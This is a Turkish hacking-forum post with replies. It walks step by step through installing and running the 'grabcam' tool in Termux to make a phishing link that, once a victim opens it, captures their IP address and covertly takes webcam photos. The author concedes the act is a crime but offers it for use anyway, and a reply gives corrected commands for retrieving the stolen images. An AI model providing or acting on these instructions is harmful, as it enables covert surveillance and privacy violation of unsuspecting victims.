Karşı tarafın kamerasına sızma

Merhaba arkadaşlar bugün size link vasıtasıyla karşı tarafın kamerasına sızmayı anlatacağım hadi işleme geçelim Kullanacağımız uygulama Termux. İlk olarak termuxu açıyoruz...

Merhaba arkadaşlar bugün size link vasıtasıyla karşı tarafın kamerasına sızmayı anlatacağım hadi işleme geçelim
Kullanacağımız uygulama Termux. İlk olarak termuxu açıyoruz sonra aşağıda listelenmiş komutları sırayla yazıyoruz.

1) apt-get update -y
2) apt-get upgrade -y
3) pkg install python -y
4) pkg install python2 -y
5) pkg install git -y
6) pip install lolcat
7) git clone https://github.com/noob-hackers/grabcam
ls
8) cd grabcam
ls
10) bash grabcam.sh

Evet şimdi karşımıza GRABCAM yazılı ekran geldi. Kod soruyor buraya 02 yazıcaz ama yazmadan önce mobil veriyi ve hotspot'u açmayı unutmayın aksi takdirde link vermez, evet yaptıktan sonra karşımıza linkimiz geldi bu linki karşı tarafa gönderiyoruz. Linke girdiği zaman ip adresini görüyoruz ve sonrasında resimleri çekmeye başlıyor ekranda Cam file received! bu yazıyı beliriyor. Çektiği fotoğrafları görmek için Ctrl ve C aynı anda basıyoruz sonra ise ls komutunu yazıyoruz sonu .png olan dosyalar çekilen fotoğraflar oluyor, ismini kopyalayıp mv helloboys.png /sdcard komutunu yazıyoruz ve artık resimler elimizde.
LİNKİ OLUŞTURURKEN MOBİL VERİYİ VE HOTSPOT'U AÇMANIZ LAZIM.

Yapılması suçtur kötü amaçlı kullanımda ben ve SpyHackerz ailesi sorumlu değildir.

Destek için
[CHARGE=2][/CHARGE]

💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Kanka spn kısmı yapamadım o sd card mevzusunu anlatirmisin sırasıyla sdcard klasörü yok ama galeride başka klasöre denedim olmadı yazım sırasında haata var bence bakarsan sevinirim

Kanka spn kısmı yapamadım o sd card mevzusunu anlatirmisin sırasıyla sdcard klasörü yok ama galeride başka klasöre denedim olmadı yazım sırasında haata var bence bakarsan sevinirim
Kanka şöyleki sonu .png olan dosyanın adını kopyala ve sonra mv helloboys.png /sdcard ve ya mv helloboys.png cd /sdcard yaz helloboys yazdığım yere kopyaladığın dosya adını yapıştır

132,053Konular
3,274,528Mesajlar
316,830Kullanıcılar
TianSon Üye
Üst Alt